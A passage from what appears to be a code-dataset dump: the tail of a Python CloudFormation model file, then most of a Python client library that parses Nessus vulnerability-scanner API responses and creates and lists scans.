python3 scripts/generate_cloudformation_actions_file.py
```
"""
dict_value = self.dict()
resources = dict_value.pop("Resources")
expanded_resources = {key: expand_actions(value) for key, value in resources.items()}
return CFModel(**dict_value, Resources=expanded_resources)
def resources_filtered_by_type(
self, allowed_types: Collection[Union[str, Type[Resource]]]
) -> Dict[str, Dict[str, Resource]]:
"""
Filtered resources based on types.
Arguments:
allowed_types: Collection of desired types.
Returns:
Dictionary where key is the logical id and value is the resource.
"""
result = {}
allowed_resource_classes = tuple(x for x in allowed_types if isinstance(x, type))
for resource_name, resource in self.Resources.items():
if isinstance(resource, allowed_resource_classes) or resource.Type in allowed_types:
result[resource_name] = resource
return result
| 39.043796 | 125 | 0.665919 | 602 | 5,349 | 5.815615 | 0.303987 | 0.021994 | 0.030848 | 0.015995 | 0.081691 | 0.051985 | 0.027992 | 0.027992 | 0.027992 | 0.027992 | 0 | 0.00442 | 0.238736 | 5,349 | 136 | 126 | 39.330882 | 0.855354 | 0.306786 | 0 | 0.057143 | 0 | 0 | 0.055572 | 0.00611 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042857 | false | 0.028571 | 0.157143 | 0 | 0.414286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
419de91687fa41f1d418876dd9614a95ee81af4f | 39,788 | py | Python | nessus/scans.py | tharvik/nessus | 4551c319ac6cb3026ddb096a0f6f71f060a578ab | [
"CC0-1.0"
] | null | null | null | nessus/scans.py | tharvik/nessus | 4551c319ac6cb3026ddb096a0f6f71f060a578ab | [
"CC0-1.0"
] | null | null | null | nessus/scans.py | tharvik/nessus | 4551c319ac6cb3026ddb096a0f6f71f060a578ab | [
"CC0-1.0"
] | null | null | null | """
sub modules for everything about the scans
"""
from enum import Enum
from uuid import uuid4
from typing import Iterable, Mapping, Union, Optional, MutableMapping
from nessus.base import LibNessusBase
from nessus.editor import NessusTemplate
from nessus.model import lying_exist, lying_type, Object, lying_exist_and_type, allow_to_exist
from nessus.permissions import NessusPermission
from nessus.policies import NessusPolicy
class NessusScanType(Enum):
"""
type of scan
"""
local = 'local'
remote = 'remote'
agent = 'agent'
class NessusScanStatus(Enum):
"""
current status of scan
lies:
- `empty` was added because sometimes, nessus return it (but it is not documented)
- `canceled` is returned instead of `cancelled`
- `processing` was added because sometimes, nessus return it (but it is not documented)
"""
completed = 'completed'
aborted = 'aborted'
imported = 'imported'
pending = 'pending'
running = 'running'
resuming = 'resuming'
canceling = 'canceling'
cancelled = 'cancelled'
pausing = 'pausing'
paused = 'paused'
stopping = 'stopping'
stopped = 'stopped'
empty = 'empty'
canceled = 'canceled'
processing = 'processing'
class NessusScan(Object):
"""
nessus is lying with:
- `type` which is none but should be NessusScanType (str)
- `status` which can be 'empty' but should be one of NessusScanStatus
- `use_dashboard` which do not always exists
"""
def __init__(self, scan_id: int, uuid: str, name: str, type: NessusScanType, owner: str, enabled: bool,
folder_id: int,
read: bool, status: NessusScanStatus, shared: bool, user_permissions: int, creation_date: int,
last_modification_date: int, control: bool, starttime: str, timezone: str, rrules: str,
use_dashboard: bool) -> None:
self.id = scan_id
self.uuid = uuid
self.name = name
self.type = type
self.owner = owner
self.enabled = enabled
self.folder_id = folder_id
self.read = read
self.status = status
self.shared = shared
self.user_permissions = user_permissions
self.creation_date = creation_date
self.last_modification_date = last_modification_date
self.control = control
self.starttime = starttime
self.timezone = timezone
self.rrules = rrules
self.use_dashboard = use_dashboard
def __eq__(self, other):
return isinstance(other, NessusScan) and self.id == other.id
def __hash__(self):
return hash(self.id)
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScan':
scan_id = int(json_dict['id'])
uuid = str(json_dict['uuid'])
name = str(json_dict['name'])
scan_type = lying_type(json_dict['type'], NessusScanType)
owner = str(json_dict['owner'])
enabled = bool(json_dict['enabled'])
folder_id = int(json_dict['folder_id'])
read = bool(json_dict['read'])
status = NessusScanStatus(json_dict['status'])
shared = bool(json_dict['shared'])
user_permissions = int(json_dict['user_permissions'])
creation_date = int(json_dict['creation_date'])
last_modification_date = int(json_dict['last_modification_date'])
control = bool(json_dict['control'])
starttime = str(json_dict['starttime'])
timezone = str(json_dict['timezone'])
rrules = str(json_dict['rrules'])
use_dashboard = lying_exist(json_dict, 'use_dashboard', bool)
return NessusScan(scan_id, uuid, name, scan_type, owner, enabled, folder_id, read, status, shared,
user_permissions,
creation_date, last_modification_date, control, starttime, timezone, rrules, use_dashboard)
class NessusScanCreated(Object):
"""
lies:
- `notification_filter_type` does not always exist
- `tag_id` does not always exist
"""
def __init__(self, creation_date: int, custom_targets: str, default_permisssions: int, description: str,
emails: str, scan_id: int, last_modification_date: int, name: str, notification_filter_type: str,
notification_filters: str, owner: str, owner_id: int, policy_id: int, enabled: bool, rrules: str,
scanner_id: int, shared: int, starttime: str, tag_id: int, timezone: str, scan_type: str,
user_permissions: int, uuid: str, use_dashboard: bool) -> None:
self.creation_date = creation_date
self.custom_targets = custom_targets
self.default_permisssions = default_permisssions
self.description = description
self.emails = emails
self.id = scan_id
self.last_modification_date = last_modification_date
self.name = name
self.notification_filter_type = notification_filter_type
self.notification_filters = notification_filters
self.owner = owner
self.owner_id = owner_id
self.policy_id = policy_id
self.enabled = enabled
self.rrules = rrules
self.scanner_id = scanner_id
self.shared = shared
self.starttime = starttime
self.tag_id = tag_id
self.timezone = timezone
self.type = scan_type
self.user_permissions = user_permissions
self.uuid = uuid
self.use_dashboard = use_dashboard
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanCreated':
creation_date = int(json_dict['creation_date'])
custom_targets = str(json_dict['custom_targets'])
default_permisssions = int(json_dict['default_permisssions'])
description = str(json_dict['description'])
emails = str(json_dict['emails'])
scan_id = int(json_dict['id'])
last_modification_date = int(json_dict['last_modification_date'])
name = str(json_dict['name'])
notification_filter_type = lying_exist(json_dict, 'notification_filter_type', str)
notification_filters = str(json_dict['notification_filters'])
owner = str(json_dict['owner'])
owner_id = int(json_dict['owner_id'])
policy_id = int(json_dict['policy_id'])
enabled = bool(json_dict['enabled'])
rrules = str(json_dict['rrules'])
scanner_id = int(json_dict['scanner_id'])
shared = int(json_dict['shared'])
starttime = str(json_dict['starttime'])
tag_id = lying_exist(json_dict, 'tag_id', int)
timezone = str(json_dict['timezone'])
scan_type = str(json_dict['type'])
user_permissions = int(json_dict['user_permissions'])
uuid = str(json_dict['uuid'])
use_dashboard = bool(json_dict['use_dashboard'])
return NessusScanCreated(creation_date, custom_targets, default_permisssions, description, emails, scan_id,
last_modification_date, name, notification_filter_type, notification_filters, owner,
owner_id, policy_id, enabled, rrules, scanner_id, shared, starttime, tag_id, timezone,
scan_type, user_permissions, uuid, use_dashboard)
class NessusScanDetailsInfo(Object):
"""
lies:
- `edit_allowed` is not always existing
- `policy` is not always existing
- `pci_can_upload` is not always existing
- `hasaudittrail` is not always existing
- `folder_id` is sometimes None
- `targets` is not always existing
- `timestamp` is not always existing
- `haskb` is not always existing
- `uuid` is not always existing
- `hostcount` is not always existing
- `scan_end` is not always existing
"""
def __init__(self, acls: Iterable[NessusPermission], edit_allowed: bool, status: str, policy: str,
pci_can_upload: bool, hasaudittrail: bool,
scan_start: str, folder_id: int, targets: str, timestamp: int, object_id: int, scanner_name: str,
haskb: bool, uuid: str, hostcount: int, scan_end: str, name: str, user_permissions: int,
control: bool) -> None:
self.acls = acls
self.edit_allowed = edit_allowed
self.status = status
self.policy = policy
self.pci_can_upload = pci_can_upload
self.hasaudittrail = hasaudittrail
self.scan_start = scan_start
self.folder_id = folder_id
self.targets = targets
self.timestamp = timestamp
self.object_id = object_id
self.scanner_name = scanner_name
self.haskb = haskb
self.uuid = uuid
self.hostcount = hostcount
self.scan_end = scan_end
self.name = name
self.user_permissions = user_permissions
self.control = control
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanDetailsInfo':
acls = {NessusPermission.from_json(acl) for acl in json_dict['acls']}
edit_allowed = lying_exist(json_dict, 'edit_allowed', bool)
status = str(json_dict['status'])
policy = lying_exist(json_dict, 'policy', str)
pci_can_upload = lying_exist(json_dict, 'pci-can-upload', bool)
hasaudittrail = lying_exist(json_dict, 'hasaudittrail', bool)
scan_start = str(json_dict['scan_start'])
folder_id = lying_type(json_dict['folder_id'], int) # it's None actually
targets = lying_exist(json_dict, 'targets', str)
timestamp = lying_exist(json_dict, 'timestamp', int)
object_id = int(json_dict['object_id'])
scanner_name = str(json_dict['scanner_name'])
haskb = lying_exist(json_dict, 'haskb', bool)
uuid = lying_exist(json_dict, 'uuid', str)
hostcount = lying_exist(json_dict, 'hostcount', int)
scan_end = lying_exist(json_dict, 'scan_end', str)
name = str(json_dict['name'])
user_permissions = int(json_dict['user_permissions'])
control = bool(json_dict['control'])
return NessusScanDetailsInfo(acls, edit_allowed, status, policy, pci_can_upload, hasaudittrail, scan_start,
folder_id, targets, timestamp, object_id, scanner_name, haskb, uuid, hostcount,
scan_end, name, user_permissions, control)
class NessusScanHost(Object):
"""
lies:
- `hostname` can be str
"""
def __init__(self, host_id: int, host_index: str, hostname: int, progress: str, critical: int, high: int,
medium: int, low: int, info: int, totalchecksconsidered: int, numchecksconsidered: int,
scanprogresstotal: int, scanprogresscurrent: int, score: int) -> None:
self.host_id = host_id
self.host_index = host_index
self.hostname = hostname
self.progress = progress
self.critical = critical
self.high = high
self.medium = medium
self.low = low
self.info = info
self.totalchecksconsidered = totalchecksconsidered
self.numchecksconsidered = numchecksconsidered
self.scanprogresstotal = scanprogresstotal
self.scanprogresscurrent = scanprogresscurrent
self.score = score
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanHost':
host_id = int(json_dict['host_id'])
host_index = str(json_dict['host_index'])
hostname = lying_type(json_dict['hostname'], int, str)
progress = str(json_dict['progress'])
critical = int(json_dict['critical'])
high = int(json_dict['high'])
medium = int(json_dict['medium'])
low = int(json_dict['low'])
info = int(json_dict['info'])
totalchecksconsidered = int(json_dict['totalchecksconsidered'])
numchecksconsidered = int(json_dict['numchecksconsidered'])
scanprogresstotal = int(json_dict['scanprogresstotal'])
scanprogresscurrent = int(json_dict['scanprogresscurrent'])
score = int(json_dict['score'])
return NessusScanHost(host_id, host_index, hostname, progress, critical, high, medium, low, info,
totalchecksconsidered, numchecksconsidered, scanprogresstotal, scanprogresscurrent,
score)
class NessusScanNote(Object):
def __init__(self, title: str, message: str, severity: int) -> None:
self.title = title
self.message = message
self.severity = severity
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanNote':
title = str(json_dict['title'])
message = str(json_dict['message'])
severity = int(json_dict['severity'])
return NessusScanNote(title, message, severity)
class NessusScanRemediation(Object):
def __init__(self, value: str, remediation: str, hosts: int, vulns: int) -> None:
self.value = value
self.remediation = remediation
self.hosts = hosts
self.vulns = vulns
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanRemediation':
value = str(json_dict['value'])
remediation = str(json_dict['remediation'])
hosts = int(json_dict['hosts'])
vulns = int(json_dict['vulns'])
return NessusScanRemediation(value, remediation, hosts, vulns)
class NessusScanDetailsRemediations(Object):
"""
lies:
- `remediations` can be None
"""
def __init__(self, remediations: Iterable[NessusScanRemediation], num_hosts: int, num_cves: int,
num_impacted_hosts: int, num_remediated_cves: int) -> None:
self.remediations = remediations
self.num_hosts = num_hosts
self.num_cves = num_cves
self.num_impacted_hosts = num_impacted_hosts
self.num_remediated_cves = num_remediated_cves
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanDetailsRemediations':
remediations = {NessusScanRemediation(remediation) for remediation in
lying_type(json_dict['remediations'], list, lambda x: None, list())}
num_hosts = int(json_dict['num_hosts'])
num_cves = int(json_dict['num_cves'])
num_impacted_hosts = int(json_dict['num_impacted_hosts'])
num_remediated_cves = int(json_dict['num_remediated_cves'])
return NessusScanDetailsRemediations(remediations, num_hosts, num_cves, num_impacted_hosts,
num_remediated_cves)
class NessusScanVulnerability(Object):
def __init__(self, plugin_id: int, plugin_name: str, plugin_family: str, count: int, vuln_index: int,
severity_index: int) -> None:
self.plugin_id = plugin_id
self.plugin_name = plugin_name
self.plugin_family = plugin_family
self.count = count
self.vuln_index = vuln_index
self.severity_index = severity_index
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanVulnerability':
plugin_id = int(json_dict['plugin_id'])
plugin_name = str(json_dict['plugin_name'])
plugin_family = str(json_dict['plugin_family'])
count = int(json_dict['count'])
vuln_index = int(json_dict['vuln_index'])
severity_index = int(json_dict['severity_index'])
return NessusScanVulnerability(plugin_id, plugin_name, plugin_family, count, vuln_index, severity_index)
class NessusScanHistory(Object):
def __init__(self, history_id: int, uuid: str, owner_id: int, status: str, creation_date: int,
last_modification_date: int) -> None:
self.history_id = history_id
self.uuid = uuid
self.owner_id = owner_id
self.status = status
self.creation_date = creation_date
self.last_modification_date = last_modification_date
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanHistory':
history_id = int(json_dict['history_id'])
uuid = str(json_dict['uuid'])
owner_id = int(json_dict['owner_id'])
status = str(json_dict['status'])
creation_date = int(json_dict['creation_date'])
last_modification_date = int(json_dict['last_modification_date'])
return NessusScanHistory(history_id, uuid, owner_id, status, creation_date, last_modification_date)
class NessusScanFilterControl(Object):
"""
lies:
- `readable_regest` is not always there
- `regex` is not always there
- `options` is not always there
"""
# FIXME what is the type of `options`?
def __init__(self, type: str, readable_regest: str, regex: str, options: Iterable) -> None:
self.type = type
self.readable_regest = readable_regest
self.regex = regex
self.options = options
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanFilterControl':
type = str(json_dict['type'])
readable_regest = lying_exist(json_dict, 'readable_regest', str)
regex = lying_exist(json_dict, 'regex', str)
options = lying_exist(json_dict, 'options', str)
return NessusScanFilterControl(type, readable_regest, regex, options)
class NessusScanFilterOperator(Enum):
eq = 'eq'
neq = 'neq'
lt = 'lt'
gt = 'gt'
match = 'match'
nmatch = 'nmatch'
date_eq = 'date-eq'
date_neq = 'date-neq'
date_lt = 'date-lt'
date_gt = 'date-gt'
class NessusScanFilter(Object):
def __init__(self, name: str, readable_name: str, operators: Iterable[NessusScanFilterOperator],
control: NessusScanFilterControl) -> None:
self.name = name
self.readable_name = readable_name
self.operators = operators
self.control = control
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanFilter':
name = str(json_dict['name'])
readable_name = str(json_dict['readable_name'])
operators = {NessusScanFilterOperator(operator) for operator in json_dict['operators']}
control = NessusScanFilterControl.from_json(json_dict['control'])
return NessusScanFilter(name, readable_name, operators, control)
class NessusScanDetails(Object):
"""
we currently drop the `dashboard` field, is it needed?
lies:
- `hosts` not always existing
- `comphosts` not always existing
- `notes` not always existing
- `notes` is sometimes None
- `remediations` not always existing
- `vulnerabilities` not always existing
- `compliance` not always existing
- `history` is sometimes None
- `filters` not always existing
"""
def __init__(self, info: NessusScanDetailsInfo, hosts: Iterable[NessusScanHost],
comphosts: Iterable[NessusScanHost], notes: Iterable[NessusScanNote],
remediations: NessusScanDetailsRemediations, vulnerabilites: Iterable[NessusScanVulnerability],
compliance: Iterable[NessusScanVulnerability], history: Iterable[NessusScanHistory],
filters: Iterable[NessusScanFilter]) -> None:
self.info = info
self.hosts = hosts
self.comphosts = comphosts
self.notes = notes
self.remediations = remediations
self.vulnerabilites = vulnerabilites
self.compliance = compliance
self.history = history
self.filters = filters
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanDetails':
info = NessusScanDetailsInfo.from_json(json_dict['info'])
hosts = {NessusScanHost.from_json(host) for host in lying_exist(json_dict, 'hosts', list)}
comphosts = {NessusScanHost.from_json(host) for host in lying_exist(json_dict, 'comphosts', list)}
notes = {NessusScanNote.from_json(note) for note in
lying_exist_and_type(json_dict, 'notes', list, lambda x: list(), list())}
remediations = lying_exist(json_dict, 'remediations', NessusScanDetailsRemediations.from_json, None)
vulnerabilities = {NessusScanVulnerability.from_json(vulnerability) for vulnerability in
lying_exist(json_dict, 'vulnerabilities', list)}
compliance = {NessusScanVulnerability.from_json(vulnerability) for vulnerability in
lying_exist(json_dict, 'compliance', list)}
history = {NessusScanHistory.from_json(history) for history in
lying_type(json_dict['history'], list, lambda x: list())}
filters = {NessusScanFilter.from_json(filtered) for filtered in lying_exist(json_dict, 'filters', list)}
return NessusScanDetails(info, hosts, comphosts, notes, remediations, vulnerabilities, compliance, history,
filters)
class NessusScanHostDetailsInfo(Object):
"""
lies:
- `mac-address` not always existing
- `host-fqdn` not always existing
"""
def __init__(self, host_start: str, mac_address: str, host_fqdn: str, host_end: str, operating_system: str,
host_ip: str) -> None:
self.host_start = host_start
self.mac_address = mac_address
self.host_fqdn = host_fqdn
self.host_end = host_end
self.operating_system = operating_system
self.host_ip = host_ip
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanHostDetailsInfo':
host_start = str(json_dict['host_start'])
mac_address = lying_exist(json_dict, 'mac-address', str)
host_fqdn = lying_exist(json_dict, 'host-fqdn', str)
host_end = str(json_dict['host_end'])
operating_system = lying_exist(json_dict, 'operating-system', str)
host_ip = str(json_dict['host-ip'])
return NessusScanHostDetailsInfo(host_start, mac_address, host_fqdn, host_end, operating_system, host_ip)
class NessusScanHostCompliance(Object):
def __init__(self, host_id: int, hostname: str, plugin_id: int, plugin_name: str, plugin_family: str, count: int,
severity_index: int, severity: int) -> None:
self.host_id = host_id
self.hostname = hostname
self.plugin_id = plugin_id
self.plugin_name = plugin_name
self.plugin_family = plugin_family
self.count = count
self.severity_index = severity_index
self.severity = severity
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanHostCompliance':
host_id = int(json_dict['host_id'])
hostname = str(json_dict['hostname'])
plugin_id = int(json_dict['plugin_id'])
plugin_name = str(json_dict['plugin_name'])
plugin_family = str(json_dict['plugin_family'])
count = int(json_dict['count'])
severity_index = int(json_dict['severity_index'])
severity = int(json_dict['severity'])
return NessusScanHostCompliance(host_id, hostname, plugin_id, plugin_name, plugin_family, count, severity_index,
severity)
class NessusScanHostVulnerability(Object):
def __init__(self, host_id: int, hostname: str, plugin_id: int, plugin_name: str, plugin_family: str, count: int,
vuln_index: int, severity_index: int, severity: int) -> None:
self.host_id = host_id
self.hostname = hostname
self.plugin_id = plugin_id
self.plugin_name = plugin_name
self.plugin_family = plugin_family
self.count = count
self.vuln_index = vuln_index
self.severity_index = severity_index
self.severity = severity
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanHostVulnerability':
host_id = int(json_dict['host_id'])
hostname = str(json_dict['hostname'])
plugin_id = int(json_dict['plugin_id'])
plugin_name = str(json_dict['plugin_name'])
plugin_family = str(json_dict['plugin_family'])
count = int(json_dict['count'])
vuln_index = int(json_dict['vuln_index'])
severity_index = int(json_dict['severity_index'])
severity = int(json_dict['severity'])
return NessusScanHostVulnerability(host_id, hostname, plugin_id, plugin_name, plugin_family, count, vuln_index,
severity_index, severity)
class NessusScanHostDetails(Object):
def __init__(self, info: NessusScanHostDetailsInfo, compliance: Iterable[NessusScanHostCompliance],
vulnerabilities: Iterable[NessusScanHostVulnerability]) -> None:
self.info = info
self.compliance = compliance
self.vulnerabilities = vulnerabilities
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanHostDetails':
info = NessusScanHostDetailsInfo.from_json(json_dict['info'])
compliance = {NessusScanHostCompliance.from_json(compliance) for compliance in json_dict['compliance']}
vulnerabilities = {NessusScanHostVulnerability.from_json(vulnerability) for vulnerability in
json_dict['vulnerabilities']}
return NessusScanHostDetails(info, compliance, vulnerabilities)
class NessusScanPluginOutputInfoDescriptionAttributesRiskInformation(Object):
"""
lies:
- there is more than simply risk_factor
- `cvss_base_score`: str (but could be float, we use that)
- `cvss_score`: str (but could be float, we use that)
- `cvss_vector`: str
- `cvss_temporal_score`: str (but could be float, we use that)
- `cvss_temporal_vector`: str
"""
def __init__(self, risk_factor: str, cvss_base_score: Optional[float], cvss_score: Optional[float],
cvss_vector: Optional[str], cvss_temporal_score: Optional[float],
cvss_temporal_vector: Optional[str]) -> None:
self.risk_factor = risk_factor
self.cvss_base_score = cvss_base_score
self.cvss_score = cvss_score
self.cvss_vector = cvss_vector
self.cvss_temporal_score = cvss_temporal_score
self.cvss_temporal_vector = cvss_temporal_vector
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) \
-> 'NessusScanPluginOutputInfoDescriptionAttributesRiskInformation':
risk_factor = str(json_dict['risk_factor'])
cvss_base_score = allow_to_exist(json_dict, 'cvss_base_score', float)
cvss_score = allow_to_exist(json_dict, 'cvss_score', float)
cvss_vector = allow_to_exist(json_dict, 'cvss_vector', str)
cvss_temporal_score = allow_to_exist(json_dict, 'cvss_temporal_score', float)
cvss_temporal_vector = allow_to_exist(json_dict, 'cvss_temporal_vector', str)
args = [risk_factor, cvss_base_score, cvss_score, cvss_vector, cvss_temporal_score, cvss_temporal_vector]
return NessusScanPluginOutputInfoDescriptionAttributesRiskInformation(*args)
class NessusScanPluginOutputInfoDescriptionAttributesPluginInformation(Object):
def __init__(self, plugin_id: int, plugin_type: str, plugin_family: str, plugin_modification_date: str) -> None:
self.plugin_id = plugin_id
self.plugin_type = plugin_type
self.plugin_family = plugin_family
self.plugin_modification_date = plugin_modification_date
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) \
-> 'NessusScanPluginOutputInfoDescriptionAttributesPluginInformation':
plugin_id = int(json_dict['plugin_id'])
plugin_type = str(json_dict['plugin_type'])
plugin_family = str(json_dict['plugin_family'])
plugin_modification_date = str(json_dict['plugin_modification_date'])
return NessusScanPluginOutputInfoDescriptionAttributesPluginInformation(plugin_id, plugin_type, plugin_family,
plugin_modification_date)
class NessusScanPluginOutputInfoDescriptionAttributesRefInformationRefValues(Object):
def __init__(self, value: Iterable[str]) -> None:
self.value = value # TODO can be tight by type
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) \
-> 'NessusScanPluginOutputInfoDescriptionAttributesRefInformationRefValues':
value = {str(value) for value in json_dict['value']}
return NessusScanPluginOutputInfoDescriptionAttributesRefInformationRefValues(value)
class NessusScanPluginOutputInfoDescriptionAttributesRefInformationRef(Object):
def __init__(self, name: str, values: NessusScanPluginOutputInfoDescriptionAttributesRefInformationRefValues,
url: Optional[str]) -> None:
self.name = name
self.values = values
self.url = url
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) \
-> 'NessusScanPluginOutputInfoDescriptionAttributesRefInformationRef':
name = str(json_dict['name']) # TODO can be tight by enum?
values = NessusScanPluginOutputInfoDescriptionAttributesRefInformationRefValues.from_json(json_dict['values'])
url = allow_to_exist(json_dict, 'url', str)
return NessusScanPluginOutputInfoDescriptionAttributesRefInformationRef(name, values, url)
class NessusScanPluginOutputInfoDescriptionAttributesRefInformation(Object):
def __init__(self, ref: Iterable[NessusScanPluginOutputInfoDescriptionAttributesRefInformationRef]) -> None:
self.ref = ref
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) \
-> 'NessusScanPluginOutputInfoDescriptionAttributesRefInformation':
ref = {NessusScanPluginOutputInfoDescriptionAttributesRefInformationRef.from_json(ref)
for ref in json_dict['ref']}
return NessusScanPluginOutputInfoDescriptionAttributesRefInformation(ref)
class NessusScanPluginOutputInfoDescriptionAttributes(Object):
"""
lies:
- `ref_information` is not documented but is present
"""
def __init__(self, risk_information: NessusScanPluginOutputInfoDescriptionAttributesRiskInformation,
plugin_name: str, plugin_information: NessusScanPluginOutputInfoDescriptionAttributesPluginInformation,
solution: Optional[str], fname: str, synopsis: str, description: str,
ref_information: Optional[NessusScanPluginOutputInfoDescriptionAttributesRefInformation]) -> None:
self.risk_information = risk_information
self.plugin_name = plugin_name
self.plugin_information = plugin_information
self.solution = solution
self.fname = fname
self.synopsis = synopsis
self.description = description
self.ref_information = ref_information
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanPluginOutputInfoDescriptionAttributes':
risk_information = \
NessusScanPluginOutputInfoDescriptionAttributesRiskInformation.from_json(json_dict['risk_information'])
plugin_name = str(json_dict['plugin_name'])
plugin_information = \
NessusScanPluginOutputInfoDescriptionAttributesPluginInformation.from_json(json_dict['plugin_information'])
if json_dict['solution'] is None:
solution = None
else:
solution = json_dict['solution']
fname = str(json_dict['fname'])
synopsis = str(json_dict['synopsis'])
description = str(json_dict['description'])
ref_information = allow_to_exist(json_dict, 'ref_information',
NessusScanPluginOutputInfoDescriptionAttributesRefInformation.from_json)
return NessusScanPluginOutputInfoDescriptionAttributes(risk_information, plugin_name, plugin_information,
solution, fname, synopsis, description, ref_information)
class NessusScanPluginOutputInfoDescription(Object):
def __init__(self, severity: int, pluginname: str,
pluginattributes: NessusScanPluginOutputInfoDescriptionAttributes, pluginfamily: str,
pluginid: int) -> None:
self.severity = severity
self.pluginname = pluginname
self.pluginattributes = pluginattributes
self.pluginfamily = pluginfamily
self.pluginid = pluginid
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanPluginOutputInfoDescription':
severity = int(json_dict['severity'])
pluginname = str(json_dict['pluginname'])
pluginattributes = NessusScanPluginOutputInfoDescriptionAttributes.from_json(json_dict['pluginattributes'])
pluginfamily = str(json_dict['pluginfamily'])
pluginid = int(json_dict['pluginid'])
return NessusScanPluginOutputInfoDescription(severity, pluginname, pluginattributes, pluginfamily, pluginid)
class Transport(Enum):
icmp = 'icmp'
tcp = 'tcp'
udp = 'udp'
class Protocol(Enum):
ajp13 = 'ajp13'
cifs = 'cifs'
dns = 'dns'
irc = 'irc'
ftp = 'ftp'
mysql = 'mysql'
netbios_ns = 'netbios-ns'
postgresql = 'postgresql'
rlogin = 'rlogin'
rmi_registry = 'rmi_registry'
rpc_portmapper = 'rpc-portmapper'
rpc_nfs = 'rpc-nfs'
rpc_nlockmgr = 'rpc-nlockmgr'
rpc_status = 'rpc-status'
rpc_mountd = 'rpc-mountd'
rsh = 'rsh'
smb = 'smb'
smtp = 'smtp'
ssh = 'ssh'
telnet = 'telnet'
tftpd = 'tftpd'
vnc = 'vnc'
wild_shell = 'wild_shell'
www = 'www'
x11 = 'x11'
class NessusScanPluginOutputPort(Object):
def __init__(self, number: int, transport: Transport, protocol: Optional[Protocol], hosts: Iterable[str]) -> None:
self.number = number
self.transport = transport
self.protocol = protocol
self.hosts = hosts
@staticmethod
def from_json(port_packed: str, json_list: Iterable[MutableMapping[str, Union[int, str, bool]]]) \
-> 'NessusScanPluginOutputPort':
port_splited = port_packed.split(' / ')
number = int(port_splited[0])
transport = Transport(port_splited[1])
protocol = (port_splited[2] != '' and Protocol(port_splited[2])) or None
hosts = {host['hostname'] for host in json_list}
return NessusScanPluginOutputPort(number=number, transport=transport, protocol=protocol, hosts=hosts)
class NessusScanPluginOutput(Object):
def __init__(self, plugin_output: str, hosts: str, severity: int, ports) -> None:
self.plugin_output = plugin_output
self.hosts = hosts
self.severity = severity
self.ports = ports
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanPluginOutput':
plugin_output = str(json_dict['plugin_output'])
hosts = str(json_dict['hosts'])
severity = int(json_dict['severity'])
ports = [NessusScanPluginOutputPort.from_json(k, v) for k, v in json_dict['ports'].items()]
return NessusScanPluginOutput(plugin_output, hosts, severity, ports)
class NessusScanPluginOutputInfo(Object):
def __init__(self, plugindescription: NessusScanPluginOutputInfoDescription) -> None:
self.plugindescription = plugindescription
@staticmethod
def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanPluginOutputInfo':
plugindescription = NessusScanPluginOutputInfoDescription.from_json(json_dict['plugindescription'])
return NessusScanPluginOutputInfo(plugindescription)
class NessusScanPluginOutputDetails(Object):
"""
lies:
- `outputs` is typo'ed as `output`
"""
def __init__(self, info: NessusScanPluginOutputInfo, output: Iterable[NessusScanPluginOutput]) -> None:
self.info = info
self.output = output
@staticmethod
def from_json(json_dict: MutableMapping[str, Union[int, str, bool]]) -> 'NessusScanPluginOutputDetails':
info = NessusScanPluginOutputInfo.from_json(json_dict.pop('info'))
output = {NessusScanPluginOutput.from_json(output) for output in json_dict.pop('outputs')}
return NessusScanPluginOutputDetails(info, output)
class LibNessusScans(LibNessusBase):
"""
module handling /scans
"""
# pylint: disable=bad-whitespace
def create(self, policy: NessusPolicy, name: Optional[str] = None, template: Optional[NessusTemplate] = None,
default_targets: Iterable[str] = ('localhost',)) -> NessusScanCreated:
"""
Creates a scan.
:param policy: policy to use
:param name: name you want for the scan
:param template: template will be taken from policy if not given
:param default_targets: need to have at least an element
:return: created scan
"""
if name is None:
name = str(uuid4())
if template is None:
template_uuid = policy.template_uuid
else:
template_uuid = template.uuid
json = {
'uuid': template_uuid,
'settings': {
'name': name,
'policy_id': policy.id,
'enabled': False,
'text_targets': ','.join(default_targets),
},
}
ans = self._post('scans', json=json)
return NessusScanCreated.from_json(ans.json()['scan'])
def list(self) -> Iterable[NessusScan]:
ans = self._get('scans')
if ans.json()['scans'] is None:
return set()
return {NessusScan.from_json(elem) for elem in ans.json()['scans']}
def delete(self, scan: NessusScan) -> None:
